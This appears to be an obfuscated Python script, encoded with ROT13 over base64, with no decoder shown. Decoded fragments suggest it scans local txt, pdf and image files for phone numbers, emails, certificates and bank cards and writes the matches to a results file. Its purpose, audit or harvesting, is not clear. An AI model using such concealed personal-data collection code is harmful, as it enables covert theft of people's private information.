oT93MKVbXFOcovO2LKWcLaZ6PvNtVPNtVPNtVPNtVPNtVPOzo3VtnFOcovOlLJ5aMFuxLKEuJ2McoTIhLJ1yKIfaoJI0LFqqJlqfMJ5aqTtaKFx6PvNtVPNtVPNtVPNtVPNtVPNtVPNtK2EoMz9loJS0K3MupvuxLKEuJ2McoTIhLJ1yKIfaMTS0LFqqJ2yqJ2yhMTI4KFjtnKEyoF5fo3qypvtcXI0tCFOcPvNtVPNtVPNtVPNtVTEuqTSoMzyfMJ5uoJIqJ2LapS97nKEyoF5fo3qypvtcsFqqVQ0tK2DhL29jrFtcPvNtVPOyoTyzVUE5pTHtCG0tW2kcozHaBtbtVPNtVPNtVTuyLJEypvN9VSfapTuiozHaYPNaL2IlqS9holpfVPqmL2uio2jaYPNaMJ1unJjaYPNaLzShn19wLKWxW10XVPNtVPNtVPOsMTS0LFN9VSgqPvNtVPNtVPNtVlOwo250MJ50VQ0tpzHhMzyhMTSfoPtaXPjbJ1k1ATHjZP1pqGyzLGIqXm8cYPy8XPjbJ15pqGEyZQNgKUH5MzR1KFgpMPxfClxaYPOwo250MJ50XDbtVPNtVPNtVTAioaEyoaDtCFOwo250MJ50YaAjoTy0XPpfWlxXVPNtVPNtVPOzo3VtnKEyoFOcovOwo250MJ50BtbtVPNtVPNtVPNtVPOsMPN9VSfarTIhoaxaKFb1PvNtVPNtVPNtVPNtVNbtVPNtVPNtVPNtVPO2YUE5pTHtCFOjLKWmMI9cqTIgXTy0MJ0cPvNtVPNtVPNtVPNtVNbtVPNtVPNtVPNtVPOcMvO2VTymVT5iqPOBo25yBtbtVPNtVPNtVPNtVPNtVPNtK2EonTIuMTIlYzyhMTI4XUE5pTHcKFN9VULXVPNtVPNtVPNtVPNtVPNtVS9xLKEuYzSjpTIhMPusMPxXVPNtVPNtVPNXVPNtVPNtVPOxLKEuJ2McoTIhLJ1yKIfaoJI0LFqqJlqbMJSxMKVaKFN9VTuyLJEypv5wo3O5XPxXVPNtVPNtVPOxLKEuJ2McoTIhLJ1yKIfaoJI0LFqqJlqfMJ5aqTtaKFN9VTkyovusMTS0LFxXVPNtVPNtVPOxLKEuJ2McoTIhLJ1yKIfaMTS0LFqqVQ0tK2EuqTRhL29jrFtcPtbtVPNtVPNtVTMipvOcozEyrPjtnKEyoFOcovOyoaIgMKWuqTHbMTS0LIgznJkyozSgMI1oW21yqTRaKIfanTIuMTIlW10cBtbtVPNtVPNtVPNtVPOsMPN9VUg9PvNtVPNtVPNtVPNtVTMipvOcVTyhVUWuozqyXTEuqTSoMzyfMJ5uoJIqJlqgMKEuW11oW2kyozq0nPqqXGbXVPNtVPNtVPNtVPNtVPNtVTyzVTEuqTSoMzyfMJ5uoJIqJlqxLKEuW11onI1onJ5xMKuqVPR9VPq4MJ5hrFp6PvNtVPNtVPNtVPNtVPNtVPNtVPNtK2EoMz9loJS0K3MupvuxLKEuJ2McoTIhLJ1yKIfaMTS0LFqqJ2yqJ2yhMTI4KFjtnKEyoF5fo3qypvtcXI0tCFOcPvNtVPNtVPNtVPNtVTEuqTSoMzyfMJ5uoJIqJ2LapS97nKEyoF5fo3qypvtcsFqqVQ0tK2DhL29jrFtcPtcxMJLtoTIun3qipzgsMz9lK3E4qPujLKEbYPOznJkyozSgMFx6PvNtVPOaoT9vLJjtpzImqJk0PvNtVPO3nKEbVT9jMJ4bpTS0nPjtMJ5wo2Ecozp9W3I0Mv04WlxtLKZtMwbXVPNtVPNtVPOfnJ5yplN9VTLhpzIuMTkcozImXPxXVPNtVNbtVPNtL29hqTIhqPk0rKOyVQ0tpTSlp2IsL29hqTIhqPufnJ5yplxXPvNtVPOcMvO0rKOyVQ09VPq0LJWfMFp6PvNtVPNtVPNtMz9lVTy0MJ0tnJ4tL29hqTIhqSfanTIuMTIlW106PvNtVPNtVPNtVPNtVTyzVTy0MJ0hoT93MKVbXFOcovO2LKWcLaZ6PvNtVPNtVPNtVPNtVPNtVPOzo3VtqvOcovOwo250MJ50JlqxLKEuW106PvNtVPNtVPNtVPNtVPNtVPNtVPNtpzImVQ0toT9wLKEyK2McoTHbqygwo250MJ50JlqbMJSxMKVaKF5cozEyrPucqTIgYzkiq2IlXPxcKFjtnKEyoF5fo3qypvtcXDbtVPNtVPNtVPNtVPNtVPNtVPNtVTyzVUWyplOcplOho3DtGz9hMGbXVPNtVPNtVPNtVPNtVPNtVPNtVPNtVPNtVlOjpzyhqPulMKZcPvNtVPNtVPNtVPNtVPNtVPNtVPNtVPNtVUWyp3IfqP5upUOyozDbWlNaYzcinJ4bXTMcoTIhLJ1yYPxepzImXFNeVPqpovpc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